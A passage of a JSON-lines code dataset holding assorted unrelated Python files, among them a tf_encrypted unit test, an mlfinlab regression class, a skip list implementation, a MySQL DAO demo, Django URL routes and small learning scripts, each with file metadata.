%d.%s%s
\\n' )\n\t\t\n\tix.close()\n\n\n","sub_path":"SeriesMgr/HelpIndex.py","file_name":"HelpIndex.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"244472927","text":"import unittest\n\nimport numpy as np\nimport tensorflow as tf\nimport tf_encrypted as tfe\n\nfrom tf_encrypted.tensor.int100 import int100factory\nfrom tf_encrypted.tensor.prime import PrimeFactory\n\n\nclass TestLSB(unittest.TestCase):\n\n def setUp(self):\n # self.M = 2 ** 15 - 1 # this one works\n self.M = 2 ** 15 + 27 # this one doesn't\n # self.M = 2 ** 31 - 3 # this one definitely doesn't\n x = np.random.choice(self.M, (50,))\n # x = np.array([1,2,3,4])\n f_bin = np.vectorize(np.binary_repr)\n f_get = np.vectorize(lambda x, ix: x[ix])\n self.expected_lsb = f_get(f_bin(x), -1).astype(np.int32)\n self.x = x.astype(np.float32)\n\n def _core_lsb(self, tensor_factory, prime_factory):\n\n with tfe.protocol.SecureNN(\n tensor_factory=tensor_factory,\n prime_factory=prime_factory,\n ) as prot:\n\n x_in = prot.define_private_variable(self.x, apply_scaling=False, name='test_lsb_input')\n x_lsb = prot.lsb(x_in)\n\n with tfe.Session() as sess:\n sess.run(tf.global_variables_initializer())\n lsb = sess.run(x_lsb.reveal(), tag='lsb')\n\n np.testing.assert_array_equal(self.expected_lsb, lsb)\n\n def test_lsb(self):\n prime_factory = PrimeFactory(self.M)\n # self._core_lsb(prime_factory, prime_factory)\n self._core_lsb(int100factory, prime_factory)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_lsb.py","file_name":"test_lsb.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505162001","text":"# Copyright 2019, Hudson and Thames Quantitative Research\r\n# All rights reserved\r\n# Read more: https://github.com/hudson-and-thames/mlfinlab/blob/master/LICENSE.txt\r\n\r\n\"\"\"\r\nImplementation of historically weighted regression method based on relevance.\r\n\"\"\"\r\n# pylint: disable=invalid-name\r\n\r\nimport warnings\r\nfrom typing import Tuple\r\nimport numpy as np\r\n\r\nfrom mlfinlab.util import devadarsh\r\n\r\n\r\nclass HistoryWeightRegression:\r\n \"\"\"\r\n The class that houses all related methods for the historically weighted regression tool.\r\n \"\"\"\r\n\r\n def __init__(self, Y_train: np.array, X_train: np.array, check_condi_num: bool = False):\r\n \"\"\"\r\n Instantiate the class with data.\r\n\r\n :param Y_train: (np.array) The 1D (n, ) dependent data vector.\r\n :param X_train: (np.array) The 2D (n-by-k) independent data vector, n: num of instances, k: num of variables\r\n or features.\r\n :param check_condi_num: (bool) Optional. Whether to check the condition number of the covariance matrix and\r\n fisher info matrix from the training data X (Their values are the same). If this number is too large then it\r\n may lead to numerical issues. Defaults to False. Toggle this off to save some computing time.\r\n \"\"\"\r\n\r\n self.X = X_train.copy()\r\n self.Y = Y_train.copy()\r\n self.X_avg = np.average(self.X, axis=0) # Columnwise average for the training data, a vector.\r\n self.Y_avg = np.average(self.Y) # Average for the dependent data, a float.\r\n\r\n # Covariance matrix from X and inverse of the covariance matrix, (effectively the Fisher info matrix)\r\n self.cov_mtx, self.fisher_info_mtx = self._calc_cov_and_fisher(X=self.X, check_condi_num=check_condi_num)\r\n\r\n devadarsh.track('HistoryWeightRegression')\r\n\r\n def get_fit_result(self) -> dict:\r\n \"\"\"\r\n Fit result and statistics using the training data.\r\n\r\n :return: (dict) The fit result and associated statistics.\r\n \"\"\"\r\n\r\n results = {'Covariance matrix': self.cov_mtx,\r\n 'Inv of cov matrix': self.fisher_info_mtx,\r\n 'Condition number of cov': np.linalg.cond(self.cov_mtx),\r\n 'Cov mtx shape': self.cov_mtx.shape}\r\n\r\n return results\r\n\r\n def predict(self, X_t: np.array, relev_ratio_threshold: float = 1) -> np.array:\r\n \"\"\"\r\n Predict the result using fitted model from a subsample chosen by the ratio of relevance.\r\n\r\n For example, if relev_ratio_threshold = 0.4, then it chooses the top 40 percentile data ranked by relevance to\r\n x_t. This method returns the prediction in column 0, also returns the associated prediction standard\r\n deviations in the column 1.\r\n\r\n For each row element x_t in X_t we have the following:\r\n y_t := y_avg + 1/(n-1) * sum{relevance(x_i, x_t) * (y_i - y_avg), subsample}\r\n where y_i, x_i are from subsamples. The matrix form is:\r\n y_t := y_avg + 1/(n-1) * (x_t - x_avg).T @ fisher_info_mtx @ (X_sub - x_avg).T @ (y_sub - y_avg)\r\n\r\n :param X_t: (np.array) The 2D (n_t-by-k) test data, n_t is the number of instances, k is the number of\r\n variables or features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1]. For example, 0.6 corresponds to the top 60 percentile data\r\n ranked by relevance to x_t. Defaults to 1.\r\n :return: (np.array) The predicted results in col 0, and standard deviations in col 1.\r\n \"\"\"\r\n\r\n # Apply for each row for X_t.\r\n Y_predicts = np.apply_along_axis(self.predict_one_val, axis=1, arr=X_t,\r\n relev_ratio_threshold=relev_ratio_threshold)\r\n\r\n return Y_predicts\r\n\r\n def predict_one_val(self, x_t: np.array, relev_ratio_threshold: float = 1) -> Tuple[float, float]:\r\n \"\"\"\r\n Predict one value using fitted model from a subsample chosen by the ratio of relevance.\r\n\r\n For example, if relev_ratio_threshold = 0.4, then it chooses the top 40 percentile data ranked by relevance to\r\n x_t. This method also returns the associated prediction standard deviations.\r\n\r\n y_t := y_avg_sub + 1/(n-1) * sum{relevance(x_i, x_t) * (y_i - y_avg_sub), subsample}\r\n where y_i, x_i are from subsamples. The equivalent matrix form is:\r\n y_t := y_avg_sub + 1/(n-1) * (x_t - x_avg).T @ fisher_info_mtx @ (X_sub - x_avg).T @ (y_sub - y_avg_sub)\r\n\r\n :param x_t: (np.array) A single row element test data, 1D (k, 1). k is the number of features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1]. For example, 0.6 corresponds to the top 60 percentile data\r\n ranked by relevance to x_t. Defaults to 1.\r\n :return: (Tuple[float, float]) The predicted result and associated standard deviation.\r\n \"\"\"\r\n\r\n # 1. Find the subsample above a relevance threshold for prediction\r\n # This is different for each x_t.\r\n X_sub, Y_sub, _, pred_std = self.find_subsample(x_t, relev_ratio_threshold, above=True)\r\n\r\n # 2. Predict\r\n subsample_size = len(Y_sub)\r\n Y_avg = np.average(Y_sub)\r\n y_t = Y_avg + 1 / (subsample_size - 1) * (\r\n (x_t - self.X_avg).reshape(1, -1) @ self.fisher_info_mtx\r\n @ ((X_sub - self.X_avg).T @ (Y_sub - Y_avg)).reshape(-1, 1))\r\n\r\n return y_t[0][0], pred_std\r\n\r\n def find_subsample(self, x_t: np.array, relev_ratio_threshold: float = 1, above: bool = True) \\\r\n -> Tuple[np.array, np.array, np.array, float]:\r\n \"\"\"\r\n Find the subsamples of X and Y in the training set by relevance above or below a given threshold with x_t.\r\n\r\n For example, if relev_ratio_threshold=0.3, above=True, then it finds the top 30 percentile.\r\n If relev_ratio_threshold=0.3, above=False, then it finds the bottom 70 percentile.\r\n\r\n The standard deviation is calculated as the sqrt of the variance of y_t hat, the prediction w.r.t. x_t:\r\n var_yt_hat = [(n-1)/n^2 * var_y] + [1/n * y_mean^2] + [var_y/n + y_mean^2/(n-1)]*var_r, where\r\n var_y is the subsample variance of Y, y_mean is the subsample average of Y, var_r is the subsample variance of\r\n relevance.\r\n\r\n :param x_t: (np.array) A single row element test data, 1D (k, 1). k is the number of features.\r\n :param relev_ratio_threshold: (float) Optional. The subsample ratio to use for predicting values ranked by\r\n relevance, must be a number between [0, 1].\r\n :param above: (bool) Optional. Whether to find the subsample above the threshold or below the threshold.\r\n :return: (Tuple[np.array, np.array, np.array, float]) The subsample for X, for Y, the corresponding\r\n indices to select the subsample and the std.\r\n \"\"\"\r\n\r\n # 1. For all occurances, find their relevance value.\r\n relevance_vals = np.apply_along_axis(func1d=self.calc_relevance, axis=1, arr=self.X, x_j=x_t)\r\n\r\n # 2. Get the index that are above/below the threshold.\r\n sorted_idx = np.argsort(relevance_vals)\r\n cutoff_idx = int(len(sorted_idx) * (1 - relev_ratio_threshold))\r\n if above:\r\n result_idx = sorted_idx[cutoff_idx:]\r\n else:\r\n result_idx = sorted_idx[:cutoff_idx]\r\n\r\n # 3. Calculate subsamples and indices\r\n X_sub = self.X[result_idx] # Fancy indexing\r\n Y_sub = self.Y[result_idx] # Fancy indexing\r\n relev_sub = relevance_vals[result_idx] # Fancy indexing\r\n\r\n # 4. Calculate standard deviation\r\n n = len(result_idx)\r\n Y_sub_var = np.var(Y_sub, ddof=1)\r\n relev_sub_var = np.var(relev_sub, ddof=1)\r\n Y_sub_mean = np.average(Y_sub)\r\n\r\n group1 = (n-1) / (n*n) * Y_sub_var\r\n group2 = (1 / n * Y_sub_mean * Y_sub_mean)\r\n group3 = relev_sub_var * (Y_sub_var / n + Y_sub_mean * Y_sub_mean / (n-1))\r\n var_yt_hat = group1 + group2 + group3\r\n std_yt_hat = np.sqrt(var_yt_hat)\r\n\r\n return X_sub, Y_sub, result_idx, std_yt_hat\r\n\r\n @staticmethod\r\n def _calc_cov_and_fisher(X: np.array, check_condi_num: bool = False) -> Tuple[np.array, np.array]:\r\n \"\"\"\r\n Find the (non-biased) covariance matrix and its inverse (fisher info matrix).\r\n\r\n i.e., cov = X.T @ X / (n-1), fisher_info_mtx = (n-1) inv(X.T @ X)\r\n\r\n :param X: (np.array) The 2D (n-by-k) independent data vector, n: num of instances, k: num of variables\r\n or features.\r\n :param check_condi_num: (bool) Optional. Whether to check the condition number of the covariance matrix and\r\n fisher info matrix from the training data X (Their values are the same). If this number is too large then it\r\n may lead to numerical issues. Defaults to False.\r\n :return: (Tuple[np.array, np.array]) The covariance matrix and its inverse.\r\n \"\"\"\r\n\r\n cov_mtx = np.cov(X.T)\r\n if check_condi_num:\r\n condi_num_cov = np.linalg.cond(cov_mtx)\r\n if condi_num_cov > 1e6:\r\n warnings.warn((\"The condition number for covariance matrix > 10^6. This may lead to numerical\" +\r\n \" issues, consider refactoring the original data.\"), RuntimeWarning)\r\n\r\n fisher_info_mtx = np.linalg.inv(cov_mtx)\r\n\r\n return cov_mtx, fisher_info_mtx\r\n\r\n def calc_relevance(self, x_i: np.array, x_j: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate relevance of x_i and x_j: r(x_i, x_j).\r\n\r\n r(x_i, x_j) := sim(x_i, x_j) + info(x_i) + info(x_j)\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param x_j: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The relevance value.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n sim_ij = self.calc_sim(x_i, x_j, fisher_info_mtx)\r\n info_i = self.calc_info(x_i, fisher_info_mtx)\r\n info_j = self.calc_info(x_j, fisher_info_mtx)\r\n\r\n relevance_value = sim_ij + info_i + info_j\r\n\r\n return relevance_value\r\n\r\n def calc_sim(self, x_i: np.array, x_j: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate the similarity of x_i and x_j: sim(x_i, x_j)\r\n\r\n sim(x_i, x_j) := -1/2 * (x_i - x_j).T @ fisher_info @ (x_i - x_j)\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param x_j: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The value of similarity.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n xi_m_xj_horiz = (x_i - x_j).reshape(1, -1) # Horizontal vector\r\n xi_m_xj_verti = (x_i - x_j).reshape(-1, 1) # Vertical vector\r\n\r\n sim_value = - 1 / 2 * (xi_m_xj_horiz @ fisher_info_mtx @ xi_m_xj_verti)\r\n\r\n return sim_value[0, 0]\r\n\r\n def calc_info(self, x_i: np.array, fisher_info_mtx: np.array = None) -> float:\r\n \"\"\"\r\n Calculate the informativeness of x_i: info(x_i)\r\n\r\n info(x_i) := 1/2 * (x_i - x_avg).T @ fisher_info @ (x_i - x_avg)\r\n Here x_avg is the training data average for each column.\r\n\r\n :param x_i: (np.array) 1D (k, ) dependent data vector for an instance where k is the number of features.\r\n :param fisher_info_mtx: (np.array) Optional. 2D (k, k) matrix for the whole training data. Defaults to the\r\n fisher info matrix stored in the class calculated using training data.\r\n :return: (float) The informativeness value.\r\n \"\"\"\r\n\r\n if fisher_info_mtx is None:\r\n fisher_info_mtx = self.fisher_info_mtx\r\n\r\n xi_m_xavg_horiz = (x_i - self.X_avg).reshape(1, -1) # Horizontal vector\r\n xi_m_xavg_verti = (x_i - self.X_avg).reshape(-1, 1) # Vertical vector\r\n\r\n infomativeness_value = 1 / 2 * (xi_m_xavg_horiz @ fisher_info_mtx @ xi_m_xavg_verti)\r\n\r\n return infomativeness_value[0, 0]\r\n","sub_path":"src/collection/mlfinlab/regression/history_weight_regression.py","file_name":"history_weight_regression.py","file_ext":"py","file_size_in_byte":12854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255560416","text":"#!/usr/bin/env python3\n# -*- encoding:utf-8 -*-\n# 关键点在于从后向前贪心,依次更新可以到后一个位置的索引值\nclass Solution:\n def canJump(self, nums):\n if not nums:\n return\n if 0 not in nums[:-1]: # 如果所有元素都不为0,那么一定可以走到最后\n return True\n end = len(nums) - 1\n for i in range(end - 1, -1, -1): # 倒着遍历,从倒数第二个数开始看\n if nums[i] + i >= end:\n end = i\n return end == 0\n# 正向\n# class Solution:\n# def canJump(self, nums) :\n# max_i = 0 #初始化最远的位置\n# for i, num in enumerate(nums):\n# if max_i >= i and i+num > max_i: # 若当前位置+跳数>最远位置\n# max_i = i+num #更新\n# return max_i>=i # 此时i为最后一位\n","sub_path":"Week_04/55_跳跃游戏.py","file_name":"55_跳跃游戏.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"157266350","text":"import json\nimport ujson\n\nimport requests\nimport arrow\n\nfrom app.common.BaseDao import BaseDao\nfrom app import logger\n\n# json转换工具:https://www.json.cn/\n\n\nbaseDao = BaseDao(\"127.0.0.1\", \"3306\", \"test\", \"test\", \"test\")\n\n__SELECT_SQL = \"\"\"\n SELECT * FROM sys_user where id < 100\n \"\"\"\n\n__SELECT_SQL_PARAMS = \"\"\"\n SELECT * FROM sys_user where id < %s\n \"\"\"\n\n\n# 查询数据\ndef query_data():\n # 查询多条数据\n datas = baseDao.query_sql(__SELECT_SQL)\n logger.info(ujson.dumps(datas))\n\n # 传参查询\n datas = baseDao.query_sql(__SELECT_SQL_PARAMS, [\"100\"])\n logger.info(ujson.dumps(datas))\n\n # 传参查询,只取一条数据\n data = baseDao.query_sql(__SELECT_SQL_PARAMS, [\"100\"], first=True)\n logger.info(ujson.dumps(data))\n\n # count数据条数\n count = baseDao.query_count_sql(__SELECT_SQL_PARAMS, [\"100\"])\n logger.info(count)\n\n\n# 新增数据\ndef insert_data():\n count = baseDao.insert_sql(\"insert into test_python(name, age) values(%s, %s)\", [\"tomA\", \"20\"])\n logger.info(count)\n\n count = baseDao.insert(\"test_python\", {\"name\": \"tomB\", \"age\": \"22\"})\n logger.info(count)\n\n\n# 更新数据\ndef update_data():\n # > -1 表示更新成功\n count = baseDao.update_sql(\"update test_python set name=%s where id=%s\", [\"updateA\", \"1\"])\n logger.info(count)\n\n count = baseDao.update(\"test_python\", {\"name\": \"tom3\", \"age\": \"23\"}, \"id=%s\", [\"3\"])\n logger.info(count)\n\n\n# 事务操作\ndef exec_data():\n # > -1 表示更新成功\n\n def call(cur):\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec1\", \"1\"])\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec2\", \"2\"])\n baseDao.execute_sql(cur, \"update test_python set name=%s where id=%s\", [\"test_exec3\", \"3\"])\n\n baseDao.execute(call)\n\n\nif __name__ == '__main__':\n # query_data()\n # insert_data()\n # update_data()\n exec_data()\n","sub_path":"app/sync/test_mysql_001.py","file_name":"test_mysql_001.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"168517768","text":"import random\nimport datetime\nimport sys\nimport time\n\n# Obtener un valor aleatorio dentro de un rango dado\nvalor = random.randint(0, 10)\nprint(valor)\n\n# Obtener un valor aleatorio dentro de una lista de elementos\nlista = [True, \"Strings\", 23, 45.6, False]\nvalor = random.choice( lista )\nprint(valor)\n\n# Cambiar el orden de los elementos aleatoriamente\nprint(lista)\nrandom.shuffle( lista )\nprint(lista)\n\n# Obtener la hora actuar con la libreria datetime\nprint(datetime.datetime.now())\n\n# Crear un indicador de progreso en la consola\nfor i in range(100):\n time.sleep(0.2)\n sys.stdout.write(\"\\r%d %%\" % i)\n sys.stdout.flush()\n","sub_path":"cf_python/22_librerias.py","file_name":"22_librerias.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572154070","text":"import logging\nfrom .message import Message, BlockStatus, ContentCode, MessageType, ResultCode\nimport time\nfrom .connection import Connection\nimport threading\nfrom collections import OrderedDict\nimport json\nfrom .__version__ import MINIMUM_GOMER_VERSION\nimport re\nfrom .exceptions import GomerNeedsUpdate\n\n\nclass SDKRequestMessageState:\n __shared_dict = {}\n\n def __init__(self):\n self.__dict__ = self.__shared_dict\n self.block_set = set()\n self.live_messages = OrderedDict()\n # self.results =\n self.logger = logging.getLogger('gomer.message_state')\n\n def add_item(self, message):\n self.live_messages[message.content.num] = message\n self.add_to_set(message)\n\n def del_item(self, message):\n self.live_messages.pop(message.content.num)\n if message.block == BlockStatus.NEVER.value or message.block == BlockStatus.ALL.value:\n return\n self.block_set.discard(message.group)\n\n def add_to_set(self, message):\n if message.block == BlockStatus.AUTO.value and message.block is not None:\n self.block_set.add(message.group)\n\n\nstate = SDKRequestMessageState()\n_state_lock = threading.Lock()\n\n\nclass Handler:\n def __init__(self):\n self.logger = logging.getLogger('gomer.handler')\n self.checked = False\n\n def handle(self, message_queue):\n global state, _state_lock\n # live_messages = state.live_messages\n while True:\n if not message_queue.empty():\n message = json.loads(message_queue.get())\n if not self.checked:\n if self.check_version(message):\n continue\n\n message = Message.from_dict(message)\n if message.content.num in state.live_messages.keys():\n if message.is_response():\n if state.live_messages[message.content.num].check_response(message):\n continue\n elif message.is_complete():\n if state.live_messages[message.content.num].completed:\n continue\n with _state_lock:\n if state.live_messages[message.content.num].check_complete(message):\n self.response_complete(message)\n if state.live_messages[message.content.num].block != BlockStatus.ALL.value:\n state.del_item(state.live_messages[message.content.num])\n else:\n self.logger.info('....handler thread:do not konw the message type: ' + str(message))\n else:\n time.sleep(0.01)\n\n def response_complete(self, message):\n message.message_type = MessageType.RESPONSE.value\n message.code = ResultCode.SUCCESS.value\n Connection().send(str(message))\n\n def check_version(self, message):\n if message.get('hard') is not None:\n version = message.get('hard').get('ver')\n pattern = r'(\\d+).(\\d+).(\\d+)'\n gomer_version = re.match(pattern, version)\n gomer_version = (\n int(gomer_version.group(1)), int(gomer_version.group(2)), int(gomer_version.group(3)))\n if gomer_version >= MINIMUM_GOMER_VERSION:\n self.checked = True\n return True\n else:\n raise GomerNeedsUpdate('Gomer version is: {}, minimun version required is: {}.{}.{}. '\n 'You can update your gomer via Gomer Android APP.'\n .format(version, MINIMUM_GOMER_VERSION[0], MINIMUM_GOMER_VERSION[1],\n MINIMUM_GOMER_VERSION[2]))\n\n\nclass MessageSender:\n def __init__(self):\n self.logger = logging.getLogger('gomer.message_sender')\n global state, _state_lock\n\n def send_original(self, message):\n Connection().send(message)\n\n def send(self, message):\n self.logger.info(\"start message: {}\".format(message))\n self.wait_for_send(message)\n Connection().send(str(message))\n with _state_lock:\n state.add_item(message)\n self.wait_for_response(message)\n self.interrupt_previous_message(message)\n if message.block == BlockStatus.ALL.value:\n while not state.live_messages[message.content.num].completed:\n time.sleep(0.01)\n self.logger.info(\"message complete\")\n\n complete_content = state.live_messages[message.content.num].complete_message.content.to_dict()\n with _state_lock:\n state.del_item(message)\n return complete_content\n return None\n\n def wait_for_send(self, message):\n while message.group in state.block_set:\n time.sleep(0.01)\n\n def interrupt_previous_message(self, message):\n if message.content.num not in state.live_messages.keys():\n return False\n with _state_lock:\n for key in state.live_messages.keys():\n if key < message.content.num and state.live_messages[key].group == message.group:\n break\n else:\n key = None\n if key:\n state.live_messages.pop(key)\n\n def wait_for_response(self, message):\n id = message.content.num\n while id in state.live_messages.keys():\n if state.live_messages[id].responsed:\n return\n time.sleep(0.01)\n\n @staticmethod\n def upload(file_type, path):\n Connection().upload(file_type=file_type, path=path)\n\n def open_video(self):\n Connection().open_video()\n\n def close_video(self):\n Connection().close_video()\n\n def open_video_data(self):\n Connection().open_video_data()\n\n def close_video_data(self):\n Connection().close_video_data()\n","sub_path":"gomer/transceiver.py","file_name":"transceiver.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625052274","text":"# coding: utf-8\n\nfrom keras.preprocessing.text import Tokenizer\n\nimport json\nfrom collections import OrderedDict\n\n\ndef create_and_save_tokenizer(data, num_words, outfilename):\n tokenizer = Tokenizer(oov_token='UNK', num_words=num_words+1)\n tokenizer.fit_on_texts(data)\n tokenizer.word_index = {e: i for e, i in tokenizer.word_index.items() if i <= num_words}\n tokenizer.word_index[tokenizer.oov_token] = num_words + 1\n\n tokenizer_dict = {\n \"word_counts\": list(tokenizer.word_counts.items()),\n \"word_docs\": tokenizer.word_docs,\n \"word_index\": tokenizer.word_index,\n \"document_count\": tokenizer.document_count,\n \"index_docs\": tokenizer.index_docs\n }\n\n with open(outfilename, 'w') as outfile:\n json.dump(tokenizer_dict, outfile)\n\n\ndef load_tokenizer_from_file(filename):\n \n tokenizer = Tokenizer()\n\n with open(filename, 'r') as infile:\n tokenizer_data = json.load(infile)\n\n tokenizer.word_counts = OrderedDict(tokenizer_data['word_counts'])\n tokenizer.word_docs = tokenizer_data['word_docs']\n tokenizer.word_index = tokenizer_data['word_index']\n tokenizer.document_count = tokenizer_data['document_count']\n tokenizer.index_docs = tokenizer_data['index_docs']\n\n return tokenizer\n","sub_path":"python/tokenizing.py","file_name":"tokenizing.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"276617413","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport random \n \nclass Node: #Class used to create a node for the skip list\n\n def __init__(self, value, level): \n self.value = value \n \n # This list will hold references to nodes on different levels \n self.forward = [None]*(level+1) \n \n \nclass SkipList: #Class to create a skiplist having a certain number of levels and probability of the level of a new node\n\n def __init__(self, max_lvl, P): \n # Maximum level for this skip list \n self.max_lvl= max_lvl \n \n #The skip list has a probability p associated with it, where 0 self.level: \n for i in range(self.level+1, rlevel+1): \n update[i] = self.header \n self.level = rlevel \n \n # create new node with random level generated \n n = self.createNode(rlevel, value) \n \n # insert node by rearranging references \n for i in range(rlevel+1): \n n.forward[i] = update[i].forward[i] \n update[i].forward[i] = n \n print(\"The value {} has been inserted.\".format(value)) \n print(\"\")\n \n def Delete(self, search_value): \n #The update array is important here too: it keeps track of nodes whose pointers may\n #need to change to “unsplice” the to-be-deleted node\n\n # create update array and initialize it \n update = [None]*(self.max_lvl+1) \n current = self.header \n\n \n #We start from highest level of skip list and\n #move the current reference forward, while the value \n #is greater than value of node next to current.\n #Otherwise, the current node gets inserted into update[] and \n # we move one level down and continue searching linearly for the node that needs to be deleted\n \n for i in range(self.level, -1, -1): \n while(current.forward[i] and current.forward[i].value < search_value): \n current = current.forward[i] \n update[i] = current \n\n \n #Reached level 0 and advanced reference to node on the\n #right, which is possibly the node we want to delete \n \n current = current.forward[0] \n\n \n if current != None and current.value == search_value: # If current node is the node to be deleted\n\n \n #The we start from lowest level and rearrange references \n #just as it is done in a singly linked list\n #when removing a particular node.\n \n for i in range(self.level+1): \n\n \n #If at level i, next node is not target \n #node, break the loop, and do not need move to a further level \n \n if update[i].forward[i] != current: \n break\n update[i].forward[i] = current.forward[i] \n\n # If there are levels that no longer have any elements residing in it, then remove those levels\n while(self.level>0 and self.header.forward[self.level] == None): \n self.level=self.level-1\n print(\"Successfully deleted {}\".format(search_value)) \n \n \n \n#We want to search for a node of a specific value , so we start from first node of “express lane”/ uppermost level\n#and keep moving on “express lane” until we \n#find a node that has a next node value greater than the value we are looking for. \n\n#Once we find such a node on “express lane”,we move to “normal lane”/lower level using a pointer from this node, \n#and linearly search for 50 on “normal lane”. \n\n#Specifically, we start from highest level of the skip list \n #and move the current reference forward while the value of the node \n #is greater than the current node's next node's value.\n#Otherwise, move one level down and continue searching \n \n def Search(self, value): \n current = self.header\n \n \n for i in range(self.level, -1, -1): \n while(current.forward[i] and current.forward[i].value < value): \n current = current.forward[i] \n \n # reached level 0 and advance reference to \n # right, which is prssibly our desired node \n current = current.forward[0] \n \n # If current node have key equal to \n # search key, we have found our target node \n if current and current.value == value: \n print(\"Found the key: {} \".format(value))\n \n \n \n def PrintSkipList(self): \n print(\"\\n----Skip List----\") \n head = self.header \n \n for lvl in range(self.level+1): \n print(\"Level {}: \".format(lvl), end=\" \")\n node = head.forward[lvl] \n \n while(node != None): \n print(node.value, end=\" \") \n node = node.forward[lvl] \n print(\"\")\n \n\n#DRIVER CODE:\nskip_lst = SkipList(3, 0.5) \nskip_lst.Insert(3) \nskip_lst.Insert(6) \nskip_lst.Insert(7) \nskip_lst.Insert(9) \nskip_lst.Insert(12) \nskip_lst.Insert(19) \nskip_lst.Insert(17) \nskip_lst.Insert(26) \nskip_lst.Insert(21) \nskip_lst.Insert(25) \n\nskip_lst.PrintSkipList() \n \n# Search for node 21\nskip_lst.Search(21) \n \n# Delete node 21 \nskip_lst.Delete(21) \n\nprint(\"\")\nprint(\"\")\nprint(\"The Skip List After Deletion:\")\nskip_lst.PrintSkipList() \n \n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Skip List, (19B-094-SE and 19B-127-SE), DSA PROJECT CODE IMPLEMENTATION.py","file_name":"Skip List, (19B-094-SE and 19B-127-SE), DSA PROJECT CODE IMPLEMENTATION.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190360808","text":"\"\"\"getlist_problem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework import routers\nfrom example import views\n\n\n# API routers\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'colors', views.ColorViewSet)\nrouter.register(r'favs', views.FavoriteColorViewSet)\n\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^api/', include(router.urls)),\n url(r'^update_favs/', views.update_favorite_colors, name='update_favorite_colors'),\n url(r'^admin/', admin.site.urls),\n]\n","sub_path":"getlist_problem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"263008313","text":"from tkinter import *\n\nclass App:\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n\n self.button = Button(\n frame, text=\"QUIT\", fg=\"red\", command=frame.quit\n )\n self.button.pack(side=LEFT)\n\n self.hi_there = Button(frame, text=\"Hello\", command=self.say_hi)\n self.hi_there.pack(side=LEFT)\n self.photo = PhotoImage(file=\"stulejka.gif\")\n\n w=Canvas(master,width=self.photo.width(),height=self.photo.height())\n w.pack()\n\n\n w.create_image(100,100,image=self.photo)\n\n def say_hi(self):\n print(\"hi there, everyone!\")\n\nroot = Tk()\n\napp = App(root)\n\nroot.mainloop()\nroot.destroy() # optional; see description below","sub_path":"chessApp.py","file_name":"chessApp.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107829236","text":"\ndef greeting(first, last):\n \"\"\"Display a simple greeting.\"\"\"\n greeting = f'Hello, {first} {last}!'\n return greeting.title()\n\n# Loop for input\nwhile True:\n print('\\nPlease tell me your name.')\n f_name = input('First name: ')\n if f_name == 'q':\n break\n l_name = input('Last name: ')\n if l_name == 'q':\n break\n print(greeting(f_name, l_name))\n","sub_path":"Chapter 